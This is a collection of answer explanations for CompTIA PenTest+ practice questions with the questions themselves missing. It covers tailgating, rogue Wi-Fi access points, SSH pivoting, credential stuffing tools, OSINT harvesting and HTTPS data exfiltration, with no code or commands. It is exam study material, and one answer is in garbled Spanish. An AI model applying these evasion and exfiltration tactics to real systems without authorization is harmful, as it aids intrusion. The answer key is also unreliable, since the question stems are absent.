CompTIA PenTest+ Exam PT0-003 Practice Questions

Answer : B

In an authorized physical assessment, the goal is to test physical security controls. Tailgating is a common and effective technique in such scenarios. Here's why option B is correct:

Tailgating: This involves following an authorized person into a secure area without proper credentials. During busy times, it's easier to blend in and gain access without being noticed. It tests the effectiveness of physical access controls and security personnel.

Cloning Badge Information: This can be effective but requires proximity to employees and specialized equipment, making it more complex and time-consuming.

Picking Locks: This is a more invasive technique that carries higher risk and is less stealthy compared to tailgating.

Dropping USB Devices: This tests employee awareness and response to malicious devices but does not directly test physical access controls.

Reference from Pentest:

Writeup HTB: Demonstrates the effectiveness of social engineering and tailgating techniques in bypassing physical security measures.

Forge HTB: Highlights the use of non-invasive methods like tailgating to test physical security without causing damage or raising alarms.

Conclusion:

Option B, tailgating into the facility during a busy time, is the best attack plan to gain access to the facility in an authorized physical assessment.

Answer : B

WiFi-Pumpkin is used for man-in-the-middle (MitM) attacks on Wi-Fi networks, making it ideal for intercepting and accessing data.

Option A (Metasploit) : Good for exploitation, but not specialized for Wi-Fi attacks.

Option B (WiFi-Pumpkin) : Correct.

Creates fake Wi-Fi access points.

Intercepts network traffic (SSL stripping, DNS spoofing).

Option C (SET - Social Engineering Toolkit) : Focuses on phishing, not Wi-Fi attacks.

Option D (theHarvester) : Used for OSINT, not Wi-Fi exploitation.

Option E (WiGLE.net) : Maps Wi-Fi networks, but does not capture sensitive data.

Reference: CompTIA PenTest+ PT0-003 Official Guide -- Wireless Attacks & Fake APs

Answer : A

Pivoting allows attackers to use a compromised host as a gateway to access internal resources.

Create an SSH tunnel using sshuttle (Option A):

sshuttle creates a transparent VPN-like connection over SSH, allowing the tester to forward traffic securely.

Advantages:

Provides encryption, preventing IDS/IPS detection.

Requires minimal interaction with the compromised host.

Incorrect options:

Option B (VNC server): VNC lacks encryption and is easily detectable.

Option C (Metasploit listener): Reverse shells can be detected by EDR solutions.

Option D (Netcat connection): Netcat is plaintext, making it highly detectable.

Answer : A

To avoid locking out accounts while attempting access, the penetration tester should use credential stuffing.

Credential Stuffing:

Definition: An attack method where attackers use a list of known username and password pairs, typically obtained from previous data breaches, to gain unauthorized access to accounts.

Advantages: Unlike brute-force attacks, credential stuffing uses already known credentials, which reduces the number of attempts per account and minimizes the risk of triggering account lockout mechanisms.

Tool: Tools like Sentry MBA, Snipr, and others are commonly used for credential stuffing attacks.

Other Techniques:

MFA Fatigue: A social engineering tactic to exhaust users into accepting multi-factor authentication requests, not applicable for avoiding lockouts in this context.

Dictionary Attack: Similar to brute-force but uses a list of likely passwords; still risks lockout due to multiple attempts.

Brute-force Attack: Systematically attempts all possible password combinations, likely to trigger account lockouts due to high number of failed attempts.

Pentest Reference:

Password Attacks: Understanding different types of password attacks and their implications on account security.

Account Lockout Policies: Awareness of how lockout mechanisms work and strategies to avoid triggering them during penetration tests.

By using credential stuffing, the penetration tester can attempt to gain access using known credentials without triggering account lockout policies, ensuring a stealthier approach to password attacks.

Answer : D

theHarvester is purpose-built for reconnaissance that supports social engineering and phishing assessments by collecting email addresses, employee names, and related identity information from public sources (for example, search engines, PGP key servers, and other OSINT repositories). In a PenTest+ workflow, this aligns directly with the objective of identifying specific people who could be targeted in a phishing simulation---especially when the tester needs a list of likely corporate users and roles to validate awareness controls and email security.

Answer : D

Enviar un archivo cifrado por HTTPS es el mtodo ms eficiente, seguro y menos sospechoso para exfiltrar datos. HTTPS cifra el contenido y es un protocolo comn que no genera tantas alertas en los sistemas de monitoreo.

Otras opciones como dnscat son ms sigilosas pero menos eficientes y requieren control sobre la infraestructura. Steganografa o TFTP pueden ser tiles, pero FTP/TFTP son inseguros y poco usados actualmente, lo cual los hace ms sospechosos.

Referencia: PT0-003 Objective 4.3 -- Explain post-exploitation techniques, including data exfiltration methods.

Answer : A

If a wireless network lacks proper encryption, attackers can inject malicious packets into the traffic stream.

Packet injection (Option A):

Attackers forge and transmit fake packets to manipulate network behavior.

Common in WEP/WPA attacks to force IV collisions or spoof DHCP responses.

Incorrect options:

Option B (Bluejacking): Sends spam messages via Bluetooth, not for network exploitation.

Option C (Beacon flooding): Overloads wireless access points, not an attack on encryption.

Option D (Signal jamming): Disrupts connectivity but does not inject packets.